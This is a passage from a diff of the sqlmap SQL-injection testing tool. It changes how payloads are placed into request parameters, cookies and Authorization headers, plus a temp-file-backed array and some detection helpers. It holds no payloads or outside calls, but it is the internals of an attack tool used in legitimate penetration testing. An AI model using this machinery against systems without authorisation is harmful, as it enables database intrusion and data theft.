from lib.core.common import isTechniqueAvailable
|
from lib.core.common import isTechniqueAvailable
|
||||||
|
@ -19,6 +20,7 @@ from lib.core.common import safeSQLIdentificatorNaming
|
||||||
from lib.core.common import singleTimeWarnMessage
|
from lib.core.common import singleTimeWarnMessage
|
||||||
from lib.core.common import splitFields
|
from lib.core.common import splitFields
|
||||||
from lib.core.common import unArrayizeValue
|
from lib.core.common import unArrayizeValue
|
||||||
|
from lib.core.common import urlencode
|
||||||
from lib.core.common import zeroDepthSearch
|
from lib.core.common import zeroDepthSearch
|
||||||
from lib.core.data import conf
|
from lib.core.data import conf
|
||||||
from lib.core.data import kb
|
from lib.core.data import kb
|
||||||
|
@ -26,11 +28,15 @@ from lib.core.data import queries
|
||||||
from lib.core.dicts import DUMP_DATA_PREPROCESS
|
from lib.core.dicts import DUMP_DATA_PREPROCESS
|
||||||
from lib.core.dicts import FROM_DUMMY_TABLE
|
from lib.core.dicts import FROM_DUMMY_TABLE
|
||||||
from lib.core.enums import DBMS
|
from lib.core.enums import DBMS
|
||||||
|
from lib.core.enums import HTTP_HEADER
|
||||||
from lib.core.enums import PAYLOAD
|
from lib.core.enums import PAYLOAD
|
||||||
from lib.core.enums import PLACE
|
from lib.core.enums import PLACE
|
||||||
from lib.core.enums import POST_HINT
|
from lib.core.enums import POST_HINT
|
||||||
from lib.core.exception import SqlmapNoneDataException
|
from lib.core.exception import SqlmapNoneDataException
|
||||||
|
from lib.core.settings import BOUNDARY_BACKSLASH_MARKER
|
||||||
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
|
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
|
||||||
|
from lib.core.settings import DEFAULT_COOKIE_DELIMITER
|
||||||
|
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
|
||||||
from lib.core.settings import GENERIC_SQL_COMMENT
|
from lib.core.settings import GENERIC_SQL_COMMENT
|
||||||
from lib.core.settings import PAYLOAD_DELIMITER
|
from lib.core.settings import PAYLOAD_DELIMITER
|
||||||
from lib.core.settings import REPLACEMENT_MARKER
|
from lib.core.settings import REPLACEMENT_MARKER
|
||||||
|
@ -73,7 +79,9 @@ class Agent(object):
|
||||||
|
|
||||||
retVal = ""
|
retVal = ""
|
||||||
|
|
||||||
if where is None and isTechniqueAvailable(kb.technique):
|
if kb.forceWhere:
|
||||||
|
where = kb.forceWhere
|
||||||
|
elif where is None and isTechniqueAvailable(kb.technique):
|
||||||
where = kb.injection.data[kb.technique].where
|
where = kb.injection.data[kb.technique].where
|
||||||
|
|
||||||
if kb.injection.place is not None:
|
if kb.injection.place is not None:
|
||||||
|
@ -84,7 +92,7 @@ class Agent(object):
|
||||||
|
|
||||||
paramString = conf.parameters[place]
|
paramString = conf.parameters[place]
|
||||||
paramDict = conf.paramDict[place]
|
paramDict = conf.paramDict[place]
|
||||||
origValue = paramDict[parameter]
|
origValue = getUnicode(paramDict[parameter])
|
||||||
|
|
||||||
if place == PLACE.URI:
|
if place == PLACE.URI:
|
||||||
paramString = origValue
|
paramString = origValue
|
||||||
|
@ -98,10 +106,8 @@ class Agent(object):
|
||||||
origValue = origValue.split(CUSTOM_INJECTION_MARK_CHAR)[0]
|
origValue = origValue.split(CUSTOM_INJECTION_MARK_CHAR)[0]
|
||||||
if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML):
|
if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML):
|
||||||
origValue = origValue.split('>')[-1]
|
origValue = origValue.split('>')[-1]
|
||||||
elif kb.postHint == POST_HINT.JSON:
|
elif kb.postHint in (POST_HINT.JSON, POST_HINT.JSON_LIKE):
|
||||||
origValue = extractRegexResult(r"(?s)\"\s*:\s*(?P<result>\d+\Z)", origValue) or extractRegexResult(r'(?s)(?P<result>[^"]+\Z)', origValue)
|
origValue = extractRegexResult(r"(?s)\"\s*:\s*(?P<result>\d+\Z)", origValue) or extractRegexResult(r'(?s)\s*(?P<result>[^"\[,]+\Z)', origValue)
|
||||||
elif kb.postHint == POST_HINT.JSON_LIKE:
|
|
||||||
origValue = extractRegexResult(r'(?s)\'\s*:\s*(?P<result>\d+\Z)', origValue) or extractRegexResult(r"(?s)(?P<result>[^']+\Z)", origValue)
|
|
||||||
else:
|
else:
|
||||||
_ = extractRegexResult(r"(?s)(?P<result>[^\s<>{}();'\"&]+\Z)", origValue) or ""
|
_ = extractRegexResult(r"(?s)(?P<result>[^\s<>{}();'\"&]+\Z)", origValue) or ""
|
||||||
origValue = _.split('=', 1)[1] if '=' in _ else ""
|
origValue = _.split('=', 1)[1] if '=' in _ else ""
|
||||||
|
@ -109,6 +115,14 @@ class Agent(object):
|
||||||
paramString = origValue
|
paramString = origValue
|
||||||
origValue = origValue.split(CUSTOM_INJECTION_MARK_CHAR)[0]
|
origValue = origValue.split(CUSTOM_INJECTION_MARK_CHAR)[0]
|
||||||
origValue = origValue[origValue.index(',') + 1:]
|
origValue = origValue[origValue.index(',') + 1:]
|
||||||
|
match = re.search(r"([^;]+)=(?P<value>[^;]+);?\Z", origValue)
|
||||||
|
if match:
|
||||||
|
origValue = match.group("value")
|
||||||
|
elif ',' in paramString:
|
||||||
|
header = paramString.split(',')[0]
|
||||||
|
|
||||||
|
if header.upper() == HTTP_HEADER.AUTHORIZATION.upper():
|
||||||
|
origValue = origValue.split(' ')[-1].split(':')[-1]
|
||||||
|
|
||||||
if conf.prefix:
|
if conf.prefix:
|
||||||
value = origValue
|
value = origValue
|
||||||
|
@ -152,7 +166,36 @@ class Agent(object):
|
||||||
elif place in (PLACE.USER_AGENT, PLACE.REFERER, PLACE.HOST):
|
elif place in (PLACE.USER_AGENT, PLACE.REFERER, PLACE.HOST):
|
||||||
retVal = paramString.replace(origValue, self.addPayloadDelimiters(newValue))
|
retVal = paramString.replace(origValue, self.addPayloadDelimiters(newValue))
|
||||||
else:
|
else:
|
||||||
retVal = re.sub(r"(\A|\b)%s=%s" % (re.escape(parameter), re.escape(origValue)), "%s=%s" % (parameter, self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
|
def _(pattern, repl, string):
|
||||||
|
retVal = string
|
||||||
|
match = None
|
||||||
|
for match in re.finditer(pattern, string):
|
||||||
|
pass
|
||||||
|
|
||||||
|
if match:
|
||||||
|
while True:
|
||||||
|
_ = re.search(r"\\g<([^>]+)>", repl)
|
||||||
|
if _:
|
||||||
|
try:
|
||||||
|
repl = repl.replace(_.group(0), match.group(int(_.group(1)) if _.group(1).isdigit() else _.group(1)))
|
||||||
|
except IndexError:
|
||||||
|
break
|
||||||
|
else:
|
||||||
|
break
|
||||||
|
retVal = string[:match.start()] + repl + string[match.end():]
|
||||||
|
return retVal
|
||||||
|
|
||||||
|
if origValue:
|
||||||
|
regex = r"(\A|\b)%s=%s%s" % (re.escape(parameter), re.escape(origValue), r"(\Z|\b)" if origValue[-1].isalnum() else "")
|
||||||
|
retVal = _(regex, "%s=%s" % (parameter, self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
|
||||||
|
else:
|
||||||
|
retVal = _(r"(\A|\b)%s=%s(\Z|%s|%s|\s)" % (re.escape(parameter), re.escape(origValue), DEFAULT_GET_POST_DELIMITER, DEFAULT_COOKIE_DELIMITER), "%s=%s\g<2>" % (parameter, self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
|
||||||
|
|
||||||
|
if retVal == paramString and urlencode(parameter) != parameter:
|
||||||
|
retVal = _(r"(\A|\b)%s=%s" % (re.escape(urlencode(parameter)), re.escape(origValue)), "%s=%s" % (urlencode(parameter), self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
|
||||||
|
|
||||||
|
if retVal:
|
||||||
|
retVal = retVal.replace(BOUNDARY_BACKSLASH_MARKER, '\\')
|
||||||
|
|
||||||
return retVal
|
return retVal
|
||||||
|
|
||||||
|
@ -176,6 +219,9 @@ class Agent(object):
|
||||||
if conf.direct:
|
if conf.direct:
|
||||||
return self.payloadDirect(expression)
|
return self.payloadDirect(expression)
|
||||||
|
|
||||||
|
if expression is None:
|
||||||
|
return None
|
||||||
|
|
||||||
expression = self.cleanupPayload(expression)
|
expression = self.cleanupPayload(expression)
|
||||||
expression = unescaper.escape(expression)
|
expression = unescaper.escape(expression)
|
||||||
query = None
|
query = None
|
||||||
|
@ -204,7 +250,7 @@ class Agent(object):
|
||||||
if not (expression and expression[0] == ';') and not (query and query[-1] in ('(', ')') and expression and expression[0] in ('(', ')')) and not (query and query[-1] == '('):
|
if not (expression and expression[0] == ';') and not (query and query[-1] in ('(', ')') and expression and expression[0] in ('(', ')')) and not (query and query[-1] == '('):
|
||||||
query += " "
|
query += " "
|
||||||
|
|
||||||
query = "%s%s" % (query, expression)
|
query = "%s%s" % ((query or "").replace('\\', BOUNDARY_BACKSLASH_MARKER), expression)
|
||||||
|
|
||||||
return query
|
return query
|
||||||
|
|
||||||
|
@ -217,6 +263,9 @@ class Agent(object):
|
||||||
if conf.direct:
|
if conf.direct:
|
||||||
return self.payloadDirect(expression)
|
return self.payloadDirect(expression)
|
||||||
|
|
||||||
|
if expression is None:
|
||||||
|
return None
|
||||||
|
|
||||||
expression = self.cleanupPayload(expression)
|
expression = self.cleanupPayload(expression)
|
||||||
|
|
||||||
# Take default values if None
|
# Take default values if None
|
||||||
|
@ -238,7 +287,7 @@ class Agent(object):
|
||||||
pass
|
pass
|
||||||
|
|
||||||
elif suffix and not comment:
|
elif suffix and not comment:
|
||||||
expression += suffix
|
expression += suffix.replace('\\', BOUNDARY_BACKSLASH_MARKER)
|
||||||
|
|
||||||
return re.sub(r"(?s);\W*;", ";", expression)
|
return re.sub(r"(?s);\W*;", ";", expression)
|
||||||
|
|
||||||
|
@ -984,7 +1033,7 @@ class Agent(object):
|
||||||
"""
|
"""
|
||||||
|
|
||||||
_ = re.escape(PAYLOAD_DELIMITER)
|
_ = re.escape(PAYLOAD_DELIMITER)
|
||||||
return re.sub("(%s.*?%s)" % (_, _), ("%s%s%s" % (PAYLOAD_DELIMITER, payload, PAYLOAD_DELIMITER)).replace("\\", r"\\"), value) if value else value
|
return re.sub("(?s)(%s.*?%s)" % (_, _), ("%s%s%s" % (PAYLOAD_DELIMITER, payload, PAYLOAD_DELIMITER)).replace("\\", r"\\"), value) if value else value
|
||||||
|
|
||||||
def runAsDBMSUser(self, query):
|
def runAsDBMSUser(self, query):
|
||||||
if conf.dbmsCred and "Ad Hoc Distributed Queries" not in query:
|
if conf.dbmsCred and "Ad Hoc Distributed Queries" not in query:
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -10,10 +10,27 @@ try:
|
||||||
except:
|
except:
|
||||||
import pickle
|
import pickle
|
||||||
|
|
||||||
|
import itertools
|
||||||
import os
|
import os
|
||||||
|
import sys
|
||||||
import tempfile
|
import tempfile
|
||||||
|
|
||||||
from lib.core.settings import BIGARRAY_CHUNK_LENGTH
|
from lib.core.exception import SqlmapSystemException
|
||||||
|
from lib.core.settings import BIGARRAY_CHUNK_SIZE
|
||||||
|
|
||||||
|
DEFAULT_SIZE_OF = sys.getsizeof(object())
|
||||||
|
|
||||||
|
def _size_of(object_):
|
||||||
|
"""
|
||||||
|
Returns total size of a given object_ (in bytes)
|
||||||
|
"""
|
||||||
|
|
||||||
|
retval = sys.getsizeof(object_, DEFAULT_SIZE_OF)
|
||||||
|
if isinstance(object_, dict):
|
||||||
|
retval += sum(_size_of(_) for _ in itertools.chain.from_iterable(object_.items()))
|
||||||
|
elif hasattr(object_, "__iter__"):
|
||||||
|
retval += sum(_size_of(_) for _ in object_)
|
||||||
|
return retval
|
||||||
|
|
||||||
class Cache(object):
|
class Cache(object):
|
||||||
"""
|
"""
|
||||||
|
@ -32,15 +49,21 @@ class BigArray(list):
|
||||||
|
|
||||||
def __init__(self):
|
def __init__(self):
|
||||||
self.chunks = [[]]
|
self.chunks = [[]]
|
||||||
|
self.chunk_length = sys.maxint
|
||||||
self.cache = None
|
self.cache = None
|
||||||
self.length = 0
|
|
||||||
self.filenames = set()
|
self.filenames = set()
|
||||||
|
self._os_remove = os.remove
|
||||||
|
self._size_counter = 0
|
||||||
|
|
||||||
def append(self, value):
|
def append(self, value):
|
||||||
self.chunks[-1].append(value)
|
self.chunks[-1].append(value)
|
||||||
if len(self.chunks[-1]) >= BIGARRAY_CHUNK_LENGTH:
|
if self.chunk_length == sys.maxint:
|
||||||
|
self._size_counter += _size_of(value)
|
||||||
|
if self._size_counter >= BIGARRAY_CHUNK_SIZE:
|
||||||
|
self.chunk_length = len(self.chunks[-1])
|
||||||
|
self._size_counter = None
|
||||||
|
if len(self.chunks[-1]) >= self.chunk_length:
|
||||||
filename = self._dump(self.chunks[-1])
|
filename = self._dump(self.chunks[-1])
|
||||||
del(self.chunks[-1][:])
|
|
||||||
self.chunks[-1] = filename
|
self.chunks[-1] = filename
|
||||||
self.chunks.append([])
|
self.chunks.append([])
|
||||||
|
|
||||||
|
@ -51,8 +74,13 @@ class BigArray(list):
|
||||||
def pop(self):
|
def pop(self):
|
||||||
if len(self.chunks[-1]) < 1:
|
if len(self.chunks[-1]) < 1:
|
||||||
self.chunks.pop()
|
self.chunks.pop()
|
||||||
|
try:
|
||||||
with open(self.chunks[-1], "rb") as fp:
|
with open(self.chunks[-1], "rb") as fp:
|
||||||
self.chunks[-1] = pickle.load(fp)
|
self.chunks[-1] = pickle.load(fp)
|
||||||
|
except IOError, ex:
|
||||||
|
errMsg = "exception occurred while retrieving data "
|
||||||
|
errMsg += "from a temporary file ('%s')" % ex
|
||||||
|
raise SqlmapSystemException, errMsg
|
||||||
return self.chunks[-1].pop()
|
return self.chunks[-1].pop()
|
||||||
|
|
||||||
def index(self, value):
|
def index(self, value):
|
||||||
|
@ -61,21 +89,41 @@ class BigArray(list):
|
||||||
return index
|
return index
|
||||||
return ValueError, "%s is not in list" % value
|
return ValueError, "%s is not in list" % value
|
||||||
|
|
||||||
def _dump(self, value):
|
def _dump(self, chunk):
|
||||||
handle, filename = tempfile.mkstemp(prefix="sqlmapba-")
|
try:
|
||||||
|
handle, filename = tempfile.mkstemp()
|
||||||
self.filenames.add(filename)
|
self.filenames.add(filename)
|
||||||
os.close(handle)
|
os.close(handle)
|
||||||
with open(filename, "w+b") as fp:
|
with open(filename, "w+b") as fp:
|
||||||
pickle.dump(value, fp, pickle.HIGHEST_PROTOCOL)
|
pickle.dump(chunk, fp, pickle.HIGHEST_PROTOCOL)
|
||||||
return filename
|
return filename
|
||||||
|
except (OSError, IOError), ex:
|
||||||
|
errMsg = "exception occurred while storing data "
|
||||||
|
errMsg += "to a temporary file ('%s'). Please " % ex
|
||||||
|
errMsg += "make sure that there is enough disk space left. If problem persists, "
|
||||||
|
errMsg += "try to set environment variable 'TEMP' to a location "
|
||||||
|
errMsg += "writeable by the current user"
|
||||||
|
raise SqlmapSystemException, errMsg
|
||||||
|
|
||||||
def _checkcache(self, index):
|
def _checkcache(self, index):
|
||||||
if (self.cache and self.cache.index != index and self.cache.dirty):
|
if (self.cache and self.cache.index != index and self.cache.dirty):
|
||||||
filename = self._dump(self.cache.data)
|
filename = self._dump(self.cache.data)
|
||||||
self.chunks[self.cache.index] = filename
|
self.chunks[self.cache.index] = filename
|
||||||
if not (self.cache and self.cache.index == index):
|
if not (self.cache and self.cache.index == index):
|
||||||
|
try:
|
||||||
with open(self.chunks[index], "rb") as fp:
|
with open(self.chunks[index], "rb") as fp:
|
||||||
self.cache = Cache(index, pickle.load(fp), False)
|
self.cache = Cache(index, pickle.load(fp), False)
|
||||||
|
except IOError, ex:
|
||||||
|
errMsg = "exception occurred while retrieving data "
|
||||||
|
errMsg += "from a temporary file ('%s')" % ex
|
||||||
|
raise SqlmapSystemException, errMsg
|
||||||
|
|
||||||
|
def __getstate__(self):
|
||||||
|
return self.chunks, self.filenames
|
||||||
|
|
||||||
|
def __setstate__(self, state):
|
||||||
|
self.__init__()
|
||||||
|
self.chunks, self.filenames = state
|
||||||
|
|
||||||
def __getslice__(self, i, j):
|
def __getslice__(self, i, j):
|
||||||
retval = BigArray()
|
retval = BigArray()
|
||||||
|
@ -88,8 +136,8 @@ class BigArray(list):
|
||||||
def __getitem__(self, y):
|
def __getitem__(self, y):
|
||||||
if y < 0:
|
if y < 0:
|
||||||
y += len(self)
|
y += len(self)
|
||||||
index = y / BIGARRAY_CHUNK_LENGTH
|
index = y / self.chunk_length
|
||||||
offset = y % BIGARRAY_CHUNK_LENGTH
|
offset = y % self.chunk_length
|
||||||
chunk = self.chunks[index]
|
chunk = self.chunks[index]
|
||||||
if isinstance(chunk, list):
|
if isinstance(chunk, list):
|
||||||
return chunk[offset]
|
return chunk[offset]
|
||||||
|
@ -98,8 +146,8 @@ class BigArray(list):
|
||||||
return self.cache.data[offset]
|
return self.cache.data[offset]
|
||||||
|
|
||||||
def __setitem__(self, y, value):
|
def __setitem__(self, y, value):
|
||||||
index = y / BIGARRAY_CHUNK_LENGTH
|
index = y / self.chunk_length
|
||||||
offset = y % BIGARRAY_CHUNK_LENGTH
|
offset = y % self.chunk_length
|
||||||
chunk = self.chunks[index]
|
chunk = self.chunks[index]
|
||||||
if isinstance(chunk, list):
|
if isinstance(chunk, list):
|
||||||
chunk[offset] = value
|
chunk[offset] = value
|
||||||
|
@ -116,11 +164,4 @@ class BigArray(list):
|
||||||
yield self[i]
|
yield self[i]
|
||||||
|
|
||||||
def __len__(self):
|
def __len__(self):
|
||||||
return len(self.chunks[-1]) if len(self.chunks) == 1 else (len(self.chunks) - 1) * BIGARRAY_CHUNK_LENGTH + len(self.chunks[-1])
|
return len(self.chunks[-1]) if len(self.chunks) == 1 else (len(self.chunks) - 1) * self.chunk_length + len(self.chunks[-1])
|
||||||
|
|
||||||
def __del__(self):
|
|
||||||
for filename in self.filenames:
|
|
||||||
try:
|
|
||||||
os.remove(filename)
|
|
||||||
except:
|
|
||||||
pass
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -9,8 +9,12 @@ import codecs
|
||||||
import contextlib
|
import contextlib
|
||||||
import cookielib
|
import cookielib
|
||||||
import copy
|
import copy
|
||||||
|
import getpass
|
||||||
|
import hashlib
|
||||||
import httplib
|
import httplib
|
||||||
import inspect
|
import inspect
|
||||||
|
import json
|
||||||
|
import locale
|
||||||
import logging
|
import logging
|
||||||
import ntpath
|
import ntpath
|
||||||
import os
|
import os
|
||||||
|
@ -23,6 +27,7 @@ import sys
|
||||||
import tempfile
|
import tempfile
|
||||||
import time
|
import time
|
||||||
import urllib
|
import urllib
|
||||||
|
import urllib2
|
||||||
import urlparse
|
import urlparse
|
||||||
import unicodedata
|
import unicodedata
|
||||||
|
|
||||||
|
@ -36,7 +41,9 @@ from subprocess import PIPE
|
||||||
from subprocess import Popen as execute
|
from subprocess import Popen as execute
|
||||||
from xml.dom import minidom
|
from xml.dom import minidom
|
||||||
from xml.sax import parse
|
from xml.sax import parse
|
||||||
|
from xml.sax import SAXParseException
|
||||||
|
|
||||||
|
from extra.beep.beep import beep
|
||||||
from extra.cloak.cloak import decloak
|
from extra.cloak.cloak import decloak
|
||||||
from extra.safe2bin.safe2bin import safecharencode
|
from extra.safe2bin.safe2bin import safecharencode
|
||||||
from lib.core.bigarray import BigArray
|
from lib.core.bigarray import BigArray
|
||||||
|
@ -71,12 +78,13 @@ from lib.core.enums import PAYLOAD
|
||||||
from lib.core.enums import REFLECTIVE_COUNTER
|
from lib.core.enums import REFLECTIVE_COUNTER
|
||||||
from lib.core.enums import SORT_ORDER
|
from lib.core.enums import SORT_ORDER
|
||||||
from lib.core.exception import SqlmapDataException
|
from lib.core.exception import SqlmapDataException
|
||||||
from lib.core.exception import SqlmapFilePathException
|
|
||||||
from lib.core.exception import SqlmapGenericException
|
from lib.core.exception import SqlmapGenericException
|
||||||
from lib.core.exception import SqlmapNoneDataException
|
from lib.core.exception import SqlmapNoneDataException
|
||||||
|
from lib.core.exception import SqlmapInstallationException
|
||||||
from lib.core.exception import SqlmapMissingDependence
|
from lib.core.exception import SqlmapMissingDependence
|
||||||
from lib.core.exception import SqlmapSilentQuitException
|
from lib.core.exception import SqlmapSilentQuitException
|
||||||
from lib.core.exception import SqlmapSyntaxException
|
from lib.core.exception import SqlmapSyntaxException
|
||||||
|
from lib.core.exception import SqlmapSystemException
|
||||||
from lib.core.exception import SqlmapUserQuitException
|
from lib.core.exception import SqlmapUserQuitException
|
||||||
from lib.core.log import LOGGER_HANDLER
|
from lib.core.log import LOGGER_HANDLER
|
||||||
from lib.core.optiondict import optDict
|
from lib.core.optiondict import optDict
|
||||||
|
@ -90,14 +98,14 @@ from lib.core.settings import DBMS_DIRECTORY_DICT
|
||||||
from lib.core.settings import DEFAULT_COOKIE_DELIMITER
|
from lib.core.settings import DEFAULT_COOKIE_DELIMITER
|
||||||
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
|
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
|
||||||
from lib.core.settings import DEFAULT_MSSQL_SCHEMA
|
from lib.core.settings import DEFAULT_MSSQL_SCHEMA
|
||||||
from lib.core.settings import DESCRIPTION
|
|
||||||
from lib.core.settings import DUMMY_SQL_INJECTION_CHARS
|
|
||||||
from lib.core.settings import DUMMY_USER_INJECTION
|
from lib.core.settings import DUMMY_USER_INJECTION
|
||||||
from lib.core.settings import DYNAMICITY_MARK_LENGTH
|
from lib.core.settings import DYNAMICITY_MARK_LENGTH
|
||||||
from lib.core.settings import ERROR_PARSING_REGEXES
|
from lib.core.settings import ERROR_PARSING_REGEXES
|
||||||
from lib.core.settings import FORCE_COOKIE_EXPIRATION_TIME
|
from lib.core.settings import FORCE_COOKIE_EXPIRATION_TIME
|
||||||
from lib.core.settings import FORM_SEARCH_REGEX
|
from lib.core.settings import FORM_SEARCH_REGEX
|
||||||
from lib.core.settings import GENERIC_DOC_ROOT_DIRECTORY_NAMES
|
from lib.core.settings import GENERIC_DOC_ROOT_DIRECTORY_NAMES
|
||||||
|
from lib.core.settings import GIT_PAGE
|
||||||
|
from lib.core.settings import GITHUB_REPORT_OAUTH_TOKEN
|
||||||
from lib.core.settings import GOOGLE_ANALYTICS_COOKIE_PREFIX
|
from lib.core.settings import GOOGLE_ANALYTICS_COOKIE_PREFIX
|
||||||
from lib.core.settings import HASHDB_MILESTONE_VALUE
|
from lib.core.settings import HASHDB_MILESTONE_VALUE
|
||||||
from lib.core.settings import HOST_ALIASES
|
from lib.core.settings import HOST_ALIASES
|
||||||
|
@ -110,7 +118,6 @@ from lib.core.settings import LARGE_OUTPUT_THRESHOLD
|
||||||
from lib.core.settings import MIN_ENCODED_LEN_CHECK
|
from lib.core.settings import MIN_ENCODED_LEN_CHECK
|
||||||
from lib.core.settings import MIN_TIME_RESPONSES
|
from lib.core.settings import MIN_TIME_RESPONSES
|
||||||
from lib.core.settings import MIN_VALID_DELAYED_RESPONSE
|
from lib.core.settings import MIN_VALID_DELAYED_RESPONSE
|
||||||
from lib.core.settings import ML
|
|
||||||
from lib.core.settings import NETSCAPE_FORMAT_HEADER_COOKIES
|
from lib.core.settings import NETSCAPE_FORMAT_HEADER_COOKIES
|
||||||
from lib.core.settings import NULL
|
from lib.core.settings import NULL
|
||||||
from lib.core.settings import PARAMETER_AMP_MARKER
|
from lib.core.settings import PARAMETER_AMP_MARKER
|
||||||
|
@ -127,9 +134,7 @@ from lib.core.settings import REFLECTED_MAX_REGEX_PARTS
|
||||||
from lib.core.settings import REFLECTED_REPLACEMENT_REGEX
|
from lib.core.settings import REFLECTED_REPLACEMENT_REGEX
|
||||||
from lib.core.settings import REFLECTED_VALUE_MARKER
|
from lib.core.settings import REFLECTED_VALUE_MARKER
|
||||||
from lib.core.settings import REFLECTIVE_MISS_THRESHOLD
|
from lib.core.settings import REFLECTIVE_MISS_THRESHOLD
|
||||||
from lib.core.settings import REVISION
|
|
||||||
from lib.core.settings import SENSITIVE_DATA_REGEX
|
from lib.core.settings import SENSITIVE_DATA_REGEX
|
||||||
from lib.core.settings import SITE
|
|
||||||
from lib.core.settings import SUPPORTED_DBMS
|
from lib.core.settings import SUPPORTED_DBMS
|
||||||
from lib.core.settings import TEXT_TAG_REGEX
|
from lib.core.settings import TEXT_TAG_REGEX
|
||||||
from lib.core.settings import TIME_STDEV_COEFF
|
from lib.core.settings import TIME_STDEV_COEFF
|
||||||
|
@ -139,7 +144,6 @@ from lib.core.settings import URI_QUESTION_MARKER
|
||||||
from lib.core.settings import URLENCODE_CHAR_LIMIT
|
from lib.core.settings import URLENCODE_CHAR_LIMIT
|
||||||
from lib.core.settings import URLENCODE_FAILSAFE_CHARS
|
from lib.core.settings import URLENCODE_FAILSAFE_CHARS
|
||||||
from lib.core.settings import USER_AGENT_ALIASES
|
from lib.core.settings import USER_AGENT_ALIASES
|
||||||
from lib.core.settings import VERSION
|
|
||||||
from lib.core.settings import VERSION_STRING
|
from lib.core.settings import VERSION_STRING
|
||||||
from lib.core.threads import getCurrentThreadData
|
from lib.core.threads import getCurrentThreadData
|
||||||
from lib.utils.sqlalchemy import _sqlalchemy
|
from lib.utils.sqlalchemy import _sqlalchemy
|
||||||
|
@ -431,10 +435,9 @@ class Backend:
|
||||||
|
|
||||||
This functions is called to:
|
This functions is called to:
|
||||||
|
|
||||||
1. Sort the tests, getSortedInjectionTests() - detection phase.
|
1. Ask user whether or not skip specific DBMS tests in detection phase,
|
||||||
2. Ask user whether or not skip specific DBMS tests in detection phase,
|
|
||||||
lib/controller/checks.py - detection phase.
|
lib/controller/checks.py - detection phase.
|
||||||
3. Sort the fingerprint of the DBMS, lib/controller/handler.py -
|
2. Sort the fingerprint of the DBMS, lib/controller/handler.py -
|
||||||
fingerprint phase.
|
fingerprint phase.
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -442,6 +445,13 @@ class Backend:
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def getIdentifiedDbms():
|
def getIdentifiedDbms():
|
||||||
|
"""
|
||||||
|
This functions is called to:
|
||||||
|
|
||||||
|
1. Sort the tests, getSortedInjectionTests() - detection phase.
|
||||||
|
2. Etc.
|
||||||
|
"""
|
||||||
|
|
||||||
dbms = None
|
dbms = None
|
||||||
|
|
||||||
if not kb:
|
if not kb:
|
||||||
|
@ -449,13 +459,13 @@ class Backend:
|
||||||
elif Backend.getForcedDbms() is not None:
|
elif Backend.getForcedDbms() is not None:
|
||||||
dbms = Backend.getForcedDbms()
|
dbms = Backend.getForcedDbms()
|
||||||
elif Backend.getDbms() is not None:
|
elif Backend.getDbms() is not None:
|
||||||
dbms = kb.dbms
|
dbms = Backend.getDbms()
|
||||||
elif conf.get("dbms"):
|
|
||||||
dbms = conf.dbms
|
|
||||||
elif Backend.getErrorParsedDBMSes():
|
|
||||||
dbms = unArrayizeValue(Backend.getErrorParsedDBMSes())
|
|
||||||
elif kb.get("injection") and kb.injection.dbms:
|
elif kb.get("injection") and kb.injection.dbms:
|
||||||
dbms = unArrayizeValue(kb.injection.dbms)
|
dbms = unArrayizeValue(kb.injection.dbms)
|
||||||
|
elif Backend.getErrorParsedDBMSes():
|
||||||
|
dbms = unArrayizeValue(Backend.getErrorParsedDBMSes())
|
||||||
|
elif conf.get("dbms"):
|
||||||
|
dbms = conf.get("dbms")
|
||||||
|
|
||||||
return aliasToDbmsEnum(dbms)
|
return aliasToDbmsEnum(dbms)
|
||||||
|
|
||||||
|
@ -537,7 +547,6 @@ def paramToDict(place, parameters=None):
|
||||||
if place in conf.parameters and not parameters:
|
if place in conf.parameters and not parameters:
|
||||||
parameters = conf.parameters[place]
|
parameters = conf.parameters[place]
|
||||||
|
|
||||||
parameters = parameters.replace(", ", ",")
|
|
||||||
parameters = re.sub(r"&(\w{1,4});", r"%s\g<1>%s" % (PARAMETER_AMP_MARKER, PARAMETER_SEMICOLON_MARKER), parameters)
|
parameters = re.sub(r"&(\w{1,4});", r"%s\g<1>%s" % (PARAMETER_AMP_MARKER, PARAMETER_SEMICOLON_MARKER), parameters)
|
||||||
if place == PLACE.COOKIE:
|
if place == PLACE.COOKIE:
|
||||||
splitParams = parameters.split(conf.cookieDel or DEFAULT_COOKIE_DELIMITER)
|
splitParams = parameters.split(conf.cookieDel or DEFAULT_COOKIE_DELIMITER)
|
||||||
|
@ -549,20 +558,23 @@ def paramToDict(place, parameters=None):
|
||||||
parts = element.split("=")
|
parts = element.split("=")
|
||||||
|
|
||||||
if len(parts) >= 2:
|
if len(parts) >= 2:
|
||||||
parameter = parts[0].replace(" ", "")
|
parameter = urldecode(parts[0].replace(" ", ""))
|
||||||
|
|
||||||
|
if not parameter:
|
||||||
|
continue
|
||||||
|
|
||||||
if conf.paramDel and conf.paramDel == '\n':
|
if conf.paramDel and conf.paramDel == '\n':
|
||||||
parts[-1] = parts[-1].rstrip()
|
parts[-1] = parts[-1].rstrip()
|
||||||
|
|
||||||
condition = not conf.testParameter
|
condition = not conf.testParameter
|
||||||
condition |= parameter in conf.testParameter
|
